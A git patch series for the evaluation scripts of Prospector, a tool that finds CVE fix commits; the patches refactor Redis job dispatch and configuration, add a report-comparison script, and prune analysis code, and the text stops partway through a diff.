@@ prospector_settings: - BUG_IN_MESSAGE - COMMIT_HAS_TWINS # Phase 2 Rules (llm_service required!): - - COMMIT_IS_SECURITY_RELEVANT \ No newline at end of file + - COMMIT_IS_SECURITY_RELEVANT + + # Report file format: "html", "json", "console" or "all" + # and the file name + report: + format: all + name: prospector-report + no_diff: False + + git_cache: /tmp/gitcache # When running Prospector containerised + + github_token: \ No newline at end of file diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index a4453a50a..1cd3767ec 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -1,7 +1,6 @@ import csv import multiprocessing import os -from typing import List, Optional import redis import requests @@ -17,189 +16,11 @@ PROSPECTOR_REPORT_PATH, load_dataset, logger, - evaluation_config, + config, ) -from git.git import Git -from git.version_to_tag import get_possible_tags from llm.llm_service import LLMService -from util.config_parser import parse_config_file -# get the redis server url -config = parse_config_file() -# redis_url = config.redis_url -backend = config.backend - -redis_url = "redis://localhost:6379/0" -# print("redis url: ", redis_url) -# print("redis url: ", backend) - - -# def commit_distance_to_adv(dataset_path: str): -# dataset = load_dataset(dataset_path) -# for itm in dataset: - - -def get_full_commit_ids(dataset_path: str): - dataset = load_dataset("empirical_study/datasets/" + dataset_path + ".csv") - for itm in dataset: - repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") - commits = [] - for commit in itm[4].split(","): - commit_id = repository.find_commit(commit) - if commit_id is not None: - commits.append(commit_id) - - print( - f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{','.join(commits)};{itm[5]}" - ) - - -def check_version_to_tag_matching(dataset_path: str): - dataset = load_dataset(dataset_path) - for itm in dataset: - repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") - tags = repository.get_tags() - - prev_version, next_version = itm[2].split(":") - prev_tag, next_tag = get_possible_tags(tags, itm[2]) - if prev_tag != "" and next_tag != "": - continue - - if prev_tag == "" and next_tag == "": - print( - f"{itm[0]}\n {prev_version}:{next_version}\n{tags}\n*****************\n" - ) - continue - if prev_tag == "": - print( - f"{itm[0]}\n {prev_version}:{next_tag}OK\n{tags}\n*****************\n" - ) - continue - if next_tag == "": - print( - f"{itm[0]}\n {prev_tag}OK:{next_version}\n{tags}\n*****************\n" - ) - continue - - # print(f"{itm[0]}\n{tags}\n") - # if prev_tag == "": - # print(f"{prev_version} -> {tags}") - - # if next_tag == "": - # print(f"{next_version} -> {tags}") - - -def get_reservation_date(cve_id: str): - # time.sleep(0.05) - url = f"https://cveawg.mitre.org/api/cve/{cve_id}" - response = requests.get(url) - if response.status_code == 200: - try: - date = response.json()["cveMetadata"]["dateReserved"] - return cve_id, int(isoparse(date).timestamp()) - except KeyError: - return None - - -def temp_load_reservation_dates(dataset_path: str): - with open(dataset_path, "r") as file: - reader = csv.reader(file, delimiter=";") - return {itm[0]: int(itm[1]) for itm in reader} - - -def delete_missing_git(dataset_path): - dataset = load_dataset(dataset_path) - for itm in dataset[:500]: - repository = Git(itm[1], "/sapmnt/home/I586140/intern/gitcache") - existing = [] - for commit in itm[4].split(","): - raw = repository.get_commit(commit) - try: - raw.extract_timestamp() - existing.append(commit) - except Exception: - pass - if len(itm[4].split(",")) != len(existing): - if len(existing) > 0: - print( - f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{','.join(existing)};{itm[5]}" - ) - else: - print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") - - -# def missing_lookup_git(missing: List[str]): -# # count = 0 -# for itm in missing: -# cve, repo, versions, _, commits, _ = itm.split(";") -# repository = Git(repo, "/sapmnt/home/I586140/intern/gitcache") -# # repository.clone() - -# repo_tags_o = repository.get_tags() -# repo_tags = get_possible_tags(repo_tags_o, versions) -# if repo_tags[0] is None and repo_tags[1] is None: -# continue -# versions = versions.split(":") -# # print(f"{cve}") - -# print(f"Vers: {versions}") -# print(f"Tags: {repo_tags}") -# existing = [] -# flag = False -# for commit in commits.split(","): -# raw_commit = repository.get_commit(commit) -# if raw_commit.exists(): -# existing.append(commit) - -# # if len(commits.split(",")) != len(existing): -# # if len(existing) > 0: -# # print(f"{cve};{repo};{versions};False;{','.join(existing)};") -# # else: -# # pass -# # count += 1 - -# try: -# raw_commit.tags = raw_commit.find_tags() - -# if repo_tags[0] in raw_commit.tags: -# print( -# repo + "/commit/" + raw_commit.id, -# " - ", -# "Vulnerable tag is fixed", -# ) -# elif ( -# repo_tags[1] in raw_commit.tags -# and repo_tags[0] not in raw_commit.tags -# ): -# commit_ts = raw_commit.get_timestamp() -# next_tag_ts = repository.get_timestamp(repo_tags[1], "a") -# prev_tag_ts = repository.get_timestamp(repo_tags[0], "a") -# if prev_tag_ts < commit_ts < next_tag_ts: -# print(repo + "/commit/" + raw_commit.id, " - ", "Weird") -# print( -# f"python client/cli/main.py {cve} --repository {repo} --version-interval {repo_tags[0]}:{repo_tags[1]}" -# ) -# else: -# print("Commit timestamp is outside the time interval") -# elif repo_tags[1] not in raw_commit.tags: -# if not flag: -# print("simola") -# flag = True -# print(repo + "/commit/" + raw_commit.id) -# ttags = [t for t in raw_commit.tags if repo_tags[1][:3] == t[:3]] -# print(ttags) -# if raw_commit.tags == []: -# print(repo + "/commit/" + raw_commit.id, " - ", "No tags") -# except Exception: -# print(repo + "/commit/" + raw_commit.id, " - ", "Commit not found") - -# print("=====================================") -# # print(f"Mismatch: {count}/{len(missing)}") - - -def update_comparison_table(dataset): - # data = load_dataset(dataset) - pass +prospector_config = config.prospector_settings def to_latex_table(): @@ -208,87 +29,65 @@ def to_latex_table(): print(f"{e[0]} & {e[1][19:]} & {e[5]} \\\\ \hline") # noqa: W605 -def parallel_execution(filename: str): - print("Executing in parallel") - print(os.getcwd()) - dataset = load_dataset("empirical_study/datasets/" + filename + ".csv") - inputs = [ - { - "vulnerability_id": cve[0], - "repository_url": cve[1], - "version_interval": cve[2], - "git_cache": "/sapmnt/home/I586140/intern/gitcache", - "limit_candidates": 2500, - "filename": filename, - "silent": True, - } - for cve in dataset - if not os.path.exists( - f"empirical_study/datasets/{filename}/{cve[0]}.json" - ) - ] - if len(inputs) == 0: - return True - try: - pool = multiprocessing.Pool(processes=4) - for _ in tqdm( - pool.imap_unordered(execute_prospector_wrapper, inputs), - total=len(inputs), - ): - pass - pool.close() - return True - except Exception: - pool.terminate() - return False - - -def execute_prospector_wrapper(kwargs): - filename = kwargs["filename"] - del kwargs["filename"] - r, a = prospector(**kwargs) - if r is not None: - generate_report( - r, a, "json", f"empirical_study/datasets/{filename}/{a.cve_id}" - ) - - def run_prospector_and_generate_report( - vuln_id, - v_int, + cve_id, + version_interval, report_type: str, output_file, repository_url: str, - enabled_rules: List[str], - run_with_llm: bool, ): """Call the prospector() and generate_report() functions. This also creates the LLMService singleton so that it is available in the context of the job. """ - # print(f"Enabled rules: {config.enabled_rules}") # sanity check - LLMService(config.llm_service) + params = { + "vulnerability_id": cve_id, + "repository_url": repository_url, + "version_interval": version_interval, + "use_backend": prospector_config.use_backend, + "backend_address": prospector_config.backend, + "git_cache": prospector_config.git_cache, + "limit_candidates": prospector_config.max_candidates, + "use_llm_repository_url": prospector_config.llm_service.use_llm_repository_url, + "enabled_rules": prospector_config.enabled_rules, + } + + if prospector_config.llm_service.use_llm_repository_url: + try: + LLMService(prospector_config.llm_service) + except Exception as e: + logger.debug(f"LLM Service could not be instantiated: {e}") + raise e - results, advisory_record = prospector( - vulnerability_id=vuln_id, - repository_url=repository_url, - version_interval=v_int, - backend_address=backend, - enabled_rules=enabled_rules, - git_cache=config.git_cache, - use_llm_repository_url=run_with_llm, - ) + try: + results, advisory_record = prospector( + vulnerability_id=cve_id, + repository_url=repository_url, + version_interval=version_interval, + backend_address=prospector_config.backend, + enabled_rules=prospector_config.enabled_rules, + git_cache=prospector_config.git_cache, + use_llm_repository_url=prospector_config.llm_service.use_llm_repository_url, + ) + except Exception as e: + logger.debug(f"prospector() crashed: {e}") + raise e - logger.debug(f"prospector() returned. Generating report now.") + logger.info(f"prospector() returned. Generating report now.") - generate_report( - results, - advisory_record, - report_type, - output_file, - ) + try: + generate_report( + results, + advisory_record, + report_type, + output_file, + prospector_params=params, + ) + except Exception as e: + logger.debug(f"Could not create report: {e}") + raise e # return results, advisory_record - return f"Ran Prospector on {vuln_id}" + return f"Ran Prospector on {cve_id}" def dispatch_prospector_jobs(filename: str, selected_cves: str): @@ -301,8 +100,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): if len(selected_cves) != 0: dataset = [c for c in dataset if c[0] in selected_cves] - prospector_settings = evaluation_config.prospector_settings - logger.debug(f"Enabled rules: {prospector_settings.enabled_rules}") + logger.debug(f"Enabled rules: {prospector_config.enabled_rules}") dispatched_jobs = 0 for cve in dataset: @@ -313,21 +111,21 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): dispatched_jobs += 1 # Send them to Prospector to run - with Connection(redis.from_url(redis_url)): + with Connection(redis.from_url(prospector_config.redis_url)): queue = Queue() job = Job.create( run_prospector_and_generate_report, kwargs={ - "vuln_id": cve[0], - "v_int": cve[2], + "cve_id": cve[0], + "version_interval": cve[2], "report_type": "json", "output_file": f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json", "repository_url": ( - cve[1] if not prospector_settings.run_with_llm else None + cve[1] + if not prospector_config.llm_service.use_llm_repository_url + else None ), - "enabled_rules": prospector_settings.enabled_rules, - "run_with_llm": prospector_settings.run_with_llm, }, description="Prospector Job", id=cve[0], @@ -341,7 +139,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): def empty_queue(): - with Connection(redis.from_url(redis_url)): + with Connection(redis.from_url(prospector_config.redis_url)): queue = Queue("default") queue.empty() diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index a621fde19..efbb733d0 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -5,7 +5,6 @@ import sys from evaluation.analyse import ( - analyse_prospector_reports, analyse_statistics, analyze_prospector, analyze_results_rules, @@ -13,10 +12,7 @@ ) from evaluation.dispatch_jobs import ( dispatch_prospector_jobs, - empty_queue, - parallel_execution, ) -from evaluation.utils import logger def is_missing(path: str): @@ -83,20 +79,6 @@ def parse_cli_args(args): help="CVE to analyze", ) - parser.add_argument( - "-p", - "--parallel", - help="Run in parallel on multiple CVEs", - action="store_true", - ) - - parser.add_argument( - "-eq", - "--empty-queue", - help="Empty the Redis Queue", - action="store_true", - ) - parser.add_argument( "-co", "--count", @@ -111,31 +93,16 @@ def main(argv): args = parse_cli_args(argv) # Run Prospector containerised - if args.execute and not args.analyze and not args.parallel: - logger.info("Dispatching jobs.") + if args.execute and not args.analyze: + # get_full_commit_ids(args.input) + # return dispatch_prospector_jobs(args.input, args.cve) - # Run Prospector in parallel - elif args.execute and not args.analyze and args.parallel: - while not parallel_execution(args.input): - pass - # parallel_execution(args.input) - - # Remove all jobs from the queue - elif ( - args.empty_queue - and not args.execute - and not args.parallel - and not args.stats - ): - empty_queue() - # analysis of Prospector report elif ( args.analyze and not args.rules and not args.execute and not args.stats ): - analyse_prospector_reports(args.input) - # analyze_prospector(args.input) + analyze_prospector(args.input) elif args.analyze and args.stats and not args.rules and not args.execute: analyse_statistics(args.input) diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index 8274ac225..7685703f3 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -6,19 +6,19 @@ from urllib.parse import urlparse from log.logger import create_logger -evaluation_config = OmegaConf.load("evaluation/config.yaml") +config = OmegaConf.load("evaluation/config.yaml") logger = create_logger("evaluation.log") -logger.setLevel(evaluation_config.debug_level) +logger.setLevel(config.debug_level) -INPUT_DATA_PATH = evaluation_config.input_data_path +INPUT_DATA_PATH = config.input_data_path # Select the folder depending whether LLMs are used or not PROSPECTOR_REPORT_PATH = ( - evaluation_config.prospector_reports_llm_path - if evaluation_config.prospector_settings.run_with_llm - else evaluation_config.prospector_reports_no_llm_path + config.prospector_reports_llm_path + if config.prospector_settings.llm_service.use_llm_repository_url + else config.prospector_reports_no_llm_path ) -ANALYSIS_RESULTS_PATH = evaluation_config.analysis_results_path +ANALYSIS_RESULTS_PATH = config.analysis_results_path VULN = ["version", "through", "versions"] From 1f8fa2901357e29c9e57ad8526553e18ec0cd710 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 30 Jul 2024 15:09:11 +0000 Subject: [PATCH 067/130] added flag to remove jobs from queue --- prospector/evaluation/README.md | 22 +++++++++++++++++----- prospector/evaluation/run_multiple.py | 12 ++++++++++++ 2 files changed, 29 insertions(+), 5 deletions(-) diff --git a/prospector/evaluation/README.md b/prospector/evaluation/README.md index 6f1447cf7..40a5c5d3b 100644 --- a/prospector/evaluation/README.md +++ b/prospector/evaluation/README.md @@ -1,15 +1,27 @@ # Evaluate Prospector -This folder contains code to run the evaluation of Prospector. +This folder contains code to run the evaluation of Prospector using Redis Queue. This means that the `prospector()` function will be packaged as a job and executed by the `prospector_worker` container. + +To see what's going on, visualise the output of the worker container with: + +```bash +docker attach prospector_worker_1 +``` + +To interact with the worker container (or any other container), run: +```bash +docker exec -it prospector_worker_1 bash +``` + ## Settings -Just like when running Prospector, there is also a configuration file for the evaluation code in this folder: `evaluation/config.yaml`. -This allows you to select data and set Prospector up in a certain way in one central place. +Just like when running Prospector, there is also a configuration file for the evaluation code in this folder: `evaluation/config.yaml`. It contains the same fields as `config.yaml`, bundled in the `prospector_settings` field, so you can set everything as usual in one central place. +All other settings (outside of the `prospector_settings`) are for setting up evaluation specific parameters. + +## Enqueuing Jobs -### How should Prospector be run? -Prospector can either be run containerised or not, set this with the `run_containerised` variable in `config.yaml`. ### Which CVEs should Prospector be run on? diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index efbb733d0..1668c6cf6 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -12,6 +12,7 @@ ) from evaluation.dispatch_jobs import ( dispatch_prospector_jobs, + empty_queue, ) @@ -79,6 +80,13 @@ def parse_cli_args(args): help="CVE to analyze", ) + parser.add_argument( + "-eq", + "--empty-queue", + help="Empty the Redis Queue", + action="store_true", + ) + parser.add_argument( "-co", "--count", @@ -107,6 +115,10 @@ def main(argv): elif args.analyze and args.stats and not args.rules and not args.execute: analyse_statistics(args.input) + # Remove all jobs from the queue + elif args.empty_queue and not args.execute and not args.stats: + empty_queue() + # analysis of rules elif args.analyze and args.rules and not args.execute: analyze_results_rules(args.input) From 971f7b7e6554b0e22b870bcf163433fcabd0f628 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 30 Jul 2024 15:09:51 +0000 Subject: [PATCH 068/130] increased default timeout --- prospector/evaluation/dispatch_jobs.py | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 1cd3767ec..ce981cafc 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -1,13 +1,8 @@ -import csv -import multiprocessing import os import redis -import requests -from dateutil.parser import isoparse from rq import Connection, Queue from rq.job import Job -from tqdm import tqdm from core.prospector import prospector from core.report import generate_report @@ -112,7 +107,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): # Send them to Prospector to run with Connection(redis.from_url(prospector_config.redis_url)): - queue = Queue() + queue = Queue(default_timeout=3600) job = Job.create( run_prospector_and_generate_report, From cb61e13638e103a56536a55aa33f7698dd717689 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 1 Aug 2024 07:34:09 +0000 Subject: [PATCH 069/130] adds script to compare pairs of prospector reports (eg. the reports from D6.3 and the currently generated ones) --- prospector/evaluation/compare.py | 237 +++++++++++++++++++++++++ prospector/evaluation/config.yaml | 14 +- prospector/evaluation/dispatch_jobs.py | 25 ++- prospector/evaluation/run_multiple.py | 6 +- prospector/evaluation/utils.py | 6 + 5 files changed, 269 insertions(+), 19 deletions(-) create mode 100644 prospector/evaluation/compare.py diff --git a/prospector/evaluation/compare.py b/prospector/evaluation/compare.py new file mode 100644 index 000000000..0a8e3dfda --- /dev/null +++ b/prospector/evaluation/compare.py @@ -0,0 +1,237 @@ +# Compare a list of Prospector JSON reports to their counterparts +# - to find out which reports have changed since D63 and what the difference is +from datetime import datetime +import json +import os +from evaluation.utils import ( + ANALYSIS_RESULTS_PATH, + logger, + config, + load_json_file, +) + + +def is_same_report(report1, report2) -> bool: + json1 = load_json_file(report1) + json2 = load_json_file(report2) + return json1 == json2 + + +def has_candidates(path: str) -> bool: + report = load_json_file(path) + return len(report["commits"]) > 0 + + +def is_first_candidate_same(path1: str, path2: str) -> bool: + report1 = load_json_file(path1) + report2 = load_json_file(path2) + + if not has_candidates(path1) and has_candidates(path2): + return True + + if not has_candidates(path1) or not has_candidates(path2): + return False + + id1 = report1["commits"][0]["commit_id"] + id2 = report2["commits"][0]["commit_id"] + + same = id1 == id2 + + if not same and report1["commits"][0]["twins"]: + # Check if they are twins + twins_report1 = [twin[1] for twin in report1["commits"][0]["twins"]] + if id2 in twins_report1: + same = True + + return same + + +def references_are_same(path1: str, path2: str) -> bool: + report1 = load_json_file(path1) + report2 = load_json_file(path2) + + return ( + report1["advisory_record"]["references"] + == report2["advisory_record"]["references"] + ) + + +def candidate_in_both(path1: str, path2: str) -> bool: + report1 = load_json_file(path1) + report2 = load_json_file(path2) + + report2_candidates = [commit["commit_id"] for commit in report2["commits"]] + if report1["commits"][0]["commit_id"] in report2_candidates: + return True + + return False + + +def tags_are_same(path1: str, path2: str) -> bool: + report1 = load_json_file(path1) + report2 = load_json_file(path2) + + id_first_candidate1 = report1["commits"][0]["commit_id"] + tags_first_candidate1 = report1["commits"][0]["tags"] + + for commit in report2["commits"]: + if commit["commit_id"] == id_first_candidate1: + return tags_first_candidate1 == commit["tags"] + + return False + + +def main(): + directory1 = config.compare_directory1 + directory2 = config.compare_directory2 + + logger.info(f"Comparing reports in {directory1} and {directory2}.") + + ## Things to measure + counterpart_exists = [] + missing_in_directory1 = [] + missing_in_directory2 = [] + + entirely_same = [] + same_references = [] + same_first_candidate = [] + different_first_candidate = [] + has_no_candidates = [] + + # Different first candidate + dfc_references = [] + dfc_first_candidate_not_in_counterpart = [] + dfc_not_in_counterpart_despite_same_references = [] + dfc_not_in_counterpart_despite_same_tags = [] + dfc_tags_and_refs = [] + dfc_only_tags = [] + + # Get reports from first directory + reports1 = [f for f in os.listdir(directory1)] + # get reports from second directory + reports2 = [f for f in os.listdir(directory2)] + + for report in reports1: + if report not in reports2: + missing_in_directory2.append(report) + continue + + counterpart_exists.append(report) + reports2.remove(report) + + if is_same_report(directory1 + report, directory2 + report): + entirely_same.append(report) + same_references.append(report) + same_first_candidate.append(report) + continue + + if is_first_candidate_same(directory1 + report, directory2 + report): + same_first_candidate.append(report) + continue + + # Reports have different first candidates + different_first_candidate.append(report) + + # because of different references + if not references_are_same(directory1 + report, directory2 + report): + dfc_references.append(report) + + # because one of the reports has no ranked candidates + if not has_candidates(directory1 + report): + has_no_candidates.append((report, "directory 1")) + continue + elif not has_candidates(directory2 + report): + has_no_candidates.append((report, "directory 2")) + continue + + if not candidate_in_both(directory1 + report, directory2 + report): + dfc_first_candidate_not_in_counterpart.append(report) + if report not in dfc_references: + dfc_not_in_counterpart_despite_same_references.append(report) + elif report not in (dfc_tags_and_refs + dfc_only_tags): + dfc_not_in_counterpart_despite_same_tags.append(report) + continue + + # because of different tags + if not tags_are_same(directory1 + report, directory2 + report): + if report in dfc_references: + dfc_tags_and_refs.append(report) + else: + dfc_only_tags.append(report) + continue + + print(report) + + missing_in_directory1 = reports2 + + # Prepare results + results = { + "timestamp": datetime.now().strftime("%d-%m-%Y, %H:%M"), + "directory1": directory1, + "directory2": directory2, + "counterparts_exist": len(counterpart_exists), + "missing_in_directory1": len(missing_in_directory1), + "missing_in_directory2": len(missing_in_directory2), + "reports_comparison": { + "entirely_same": len(entirely_same), + "same_first_candidate": { + "count": len(same_first_candidate), + }, + "different_first_candidate": { + "count": len(different_first_candidate), + "reports": different_first_candidate, + "of_which_have_different_references": { + "count": len(dfc_references), + "reports": dfc_references, + }, + "of_which_have_different_tags": { + "count": len(dfc_only_tags), + "reports": dfc_only_tags, + }, + "one_report_has_no_candidates_at_all": { + "count": len(has_no_candidates), + "reports": has_no_candidates, + }, + "first_candidate_not_in_counterpart": { + "count": len(dfc_first_candidate_not_in_counterpart), + "reports": dfc_first_candidate_not_in_counterpart, + "of_which_have_same_references": { + "count": len( + dfc_not_in_counterpart_despite_same_references + ), + "reports": dfc_not_in_counterpart_despite_same_references, + }, + "of_which_have_same_tags": { + "count": len( + dfc_not_in_counterpart_despite_same_tags, + ), + "reports": dfc_not_in_counterpart_despite_same_tags, + }, + }, + }, + }, + } + + # Append results to JSON file + output_path = os.path.join(ANALYSIS_RESULTS_PATH, "reports_comparison.json") + + try: + with open(output_path, "r") as f: + existing_data = json.load(f) + + except (FileNotFoundError, json.JSONDecodeError): + existing_data = {"reports_comparison": []} + + # Append new result + existing_data["reports_comparison"].append(results) + + # Write results to JSON file + output_path = os.path.join(ANALYSIS_RESULTS_PATH, "reports_comparison.json") + with open(output_path, "w") as f: + json.dump(existing_data, f, indent=2) + + logger.info(f"Comparison results written to {output_path}") + + +if __name__ == "__main__": + main() diff --git a/prospector/evaluation/config.yaml b/prospector/evaluation/config.yaml index cc295a297..4c0625a19 100644 --- a/prospector/evaluation/config.yaml +++ b/prospector/evaluation/config.yaml @@ -1,16 +1,24 @@ # Debug Level -debug_level: INFO +debug_level: DEBUG # Input Data input_data_path: evaluation/data/input/ # datasets to run prospector on (CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS) # Prospector Reports -prospector_reports_llm_path: evaluation/data/reports_with_llm/ # reports generated by Prospector, sorted by names of input datasets -prospector_reports_no_llm_path: evaluation/data/reports_without_llm/ # reports generated by Prospector, sorted by names of input datasets +prospector_reports_llm_path: evaluation/data/reports_with_llm_mvi/ # reports generated by Prospector, sorted by names of input datasets +# prospector_reports_llm_path: evaluation/data/reports_with_llm/ # reports generated by Prospector, sorted by names of input datasets +prospector_reports_no_llm_path: evaluation/data/reports_without_llm_mvi/ +# reports generated by Prospector, sorted by names of input datasets: +# evaluation/data/matteo_reports/ +# evaluation/data/reports_without_llm/ # Analysis Results analysis_results_path: evaluation/data/results/ +# Report Comparison directories +compare_directory1: evaluation/data/matteo_reports/d63/ +compare_directory2: evaluation/data/reports_without_llm_mvi/d63_correct_us/ + # Prospector settings (1:1 from the Prospector config.yaml) prospector_settings: # Whether to preprocess only the repository's commits or fully run prospector diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index ce981cafc..539bb293f 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -50,21 +50,13 @@ def run_prospector_and_generate_report( try: LLMService(prospector_config.llm_service) except Exception as e: - logger.debug(f"LLM Service could not be instantiated: {e}") + logger.error(f"LLM Service could not be instantiated: {e}") raise e try: - results, advisory_record = prospector( - vulnerability_id=cve_id, - repository_url=repository_url, - version_interval=version_interval, - backend_address=prospector_config.backend, - enabled_rules=prospector_config.enabled_rules, - git_cache=prospector_config.git_cache, - use_llm_repository_url=prospector_config.llm_service.use_llm_repository_url, - ) + results, advisory_record = prospector(**params) except Exception as e: - logger.debug(f"prospector() crashed: {e}") + logger.error(f"prospector() crashed at {cve_id}: {e}") raise e logger.info(f"prospector() returned. Generating report now.") @@ -78,7 +70,7 @@ def run_prospector_and_generate_report( prospector_params=params, ) except Exception as e: - logger.debug(f"Could not create report: {e}") + logger.error(f"Could not create report: {e}") raise e # return results, advisory_record @@ -89,13 +81,14 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): """Dispatches jobs to the queue.""" dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - # dataset = dataset[20:25] + dataset = dataset[100:] # Only run a subset of CVEs if the user supplied a selected set if len(selected_cves) != 0: dataset = [c for c in dataset if c[0] in selected_cves] logger.debug(f"Enabled rules: {prospector_config.enabled_rules}") + logger.info(f"Prospector settings: {prospector_config.enabled_rules}") dispatched_jobs = 0 for cve in dataset: @@ -128,8 +121,14 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): queue.enqueue_job(job) + registry = queue.failed_job_registry + for job_id in registry.get_job_ids(): + job = Job.fetch(job_id) + print(job_id, job.exc_info) + # print(f"Dispatched job {cve[0]} to queue.") # Sanity Check + logger.info(f"Dispatched {dispatched_jobs} jobs.") print(f"Dispatched {dispatched_jobs} jobs.") diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index 1668c6cf6..51905732c 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -5,6 +5,7 @@ import sys from evaluation.analyse import ( + analyse_prospector_reports, analyse_statistics, analyze_prospector, analyze_results_rules, @@ -102,15 +103,14 @@ def main(argv): # Run Prospector containerised if args.execute and not args.analyze: - # get_full_commit_ids(args.input) - # return dispatch_prospector_jobs(args.input, args.cve) # analysis of Prospector report elif ( args.analyze and not args.rules and not args.execute and not args.stats ): - analyze_prospector(args.input) + # analyze_prospector(args.input) + analyse_prospector_reports(args.input) elif args.analyze and args.stats and not args.rules and not args.execute: analyse_statistics(args.input) diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index 7685703f3..ef832c8a5 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -1,4 +1,5 @@ import csv +import json import re from omegaconf import OmegaConf @@ -43,6 +44,11 @@ def load_dataset(path: str): return [row for row in reader if "CVE" in row[0] and row[3] != "True"] +def load_json_file(path: str) -> dict: + with open(path, "r") as f: + return json.load(f) + + def is_real_version(text: str): return bool(re.match(r"\d+\.(?:\d+\.*)*\d", text)) From 4d75870c9f1aaf713509ba2e6cc020f2d129935e Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 2 Aug 2024 08:43:15 +0000 Subject: [PATCH 070/130] clean analysis code --- prospector/evaluation/analyse.py | 940 ++++++------------------------- 1 file changed, 162 insertions(+), 778 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 8667b612d..7a7667330 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -1,17 +1,12 @@ -import csv from datetime import datetime import json -from collections import defaultdict import os from typing import Dict, List, Tuple -import seaborn as sns -from matplotlib import pyplot as plt from tqdm import tqdm from evaluation.utils import ( load_dataset, - update_false_positives, update_summary_execution_table, logger, INPUT_DATA_PATH, @@ -23,10 +18,18 @@ STRONG_RULES = [ "COMMIT_IN_REFERENCE", "VULN_ID_IN_MESSAGE", - "VULN_ID_IN_LINKED_ISSUE", "XREF_BUG", "XREF_GH", + "VULN_ID_IN_LINKED_ISSUE", ] +# Analyse old reports before rule names changed +# STRONG_RULES = [ +# "COMMIT_IN_REFERENCE", +# "CVE_ID_IN_MESSAGE", +# "CROSS_REFERENCED_JIRA_LINK", +# "CROSS_REFERENCED_GH_LINK", +# "CVE_ID_IN_LINKED_ISSUE", +# ] WEAK_RULES = [ "CHANGES_RELEVANT_FILES", @@ -43,847 +46,228 @@ ] -def analyze_results_rules(dataset_path: str): - """This function analyses Prospector's rule application. It calculates the - frequency of each rule being matched across the dataset in `dataset_path`. - - It also generates a bar plot visualising the ferquency of each rule being - matched. - - Prints: - Precision of the rules table (D6.3 AssureMOSS) - """ - print(f"Retrieving data from: {dataset_path}") - dataset = load_dataset(INPUT_DATA_PATH + dataset_path + ".csv") - - rules, table = {}, {} - count = 0 - - for itm in dataset: - try: - r, i, v, id = check_report_get_rules( - PROSPECTOR_REPORT_PATH + dataset_path + "/", itm[0], itm[4] - ) - if r is not None: - count += 1 - table[itm[0]] = [id, v, r, itm] - for rule in r: - if rule not in rules: - rules[rule] = 1 - rules[rule] += 1 - except FileNotFoundError: - continue - - ordered = dict(sorted(rules.items())) - for k, v in ordered.items(): - print(f"{k} & {v} & {(v / count)*100:.2f}\\% \\\\") - - plt.rcParams["figure.autolayout"] = True - sns.set_style("whitegrid") - colors = [ - ( - "#0063B2FF" - if id - in ( - "COMMIT_IN_REFERENCE", - "CROSS_REFERENCED_GH_LINK", - "CVE_ID_IN_LINKED_ISSUE", - "CVE_ID_IN_MESSAGE", - ) - else "#9CC3D5FF" - ) - for id in ordered.keys() - ] - ss = sns.barplot( - y=list(ordered.keys()), - x=list(ordered.values()), - palette=colors, - ) - ss.set_xscale("log", base=2) - ss.set_xticks([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) - ss.set_xticklabels([2, 4, 8, 16, 32, 64, 128, 256, 512, 1024]) - - # ss.set_xticks(range(0, 800, 100)) - ss.tick_params(axis="y", labelsize=8) - plt.show() - print(count) - for k, v in table.items(): - if "CVE_ID_IN_LINKED_ISSUE" in v[2]: - print( - f"{v[3][0]};{v[3][1]};{v[3][2]};{v[3][3]};{v[3][4]};{v[3][5]}" - ) - # print(f"{k}: {v[3]}/commit/{v[0]}") - - def analyse_prospector_reports(filename: str): """Analyses Prospector reports. Creates the summary_execution_results table.""" file = INPUT_DATA_PATH + filename + ".csv" dataset = load_dataset(file) - # dataset = dataset[42:47] + # dataset = dataset[746:747] # Actual line number in D53.csv -2 - #### Analysis run statistics # Keep track of how many reports were attempted to be analysed - attempted_report_analysis = 0 - # Keep track of how many reports were analysed - num_analysed_reports = 0 + attempted_count = 0 + # Keep track of how many reports were actually analysed + analysed_reports_count = 0 # Keep track of the CVEs where there is no report 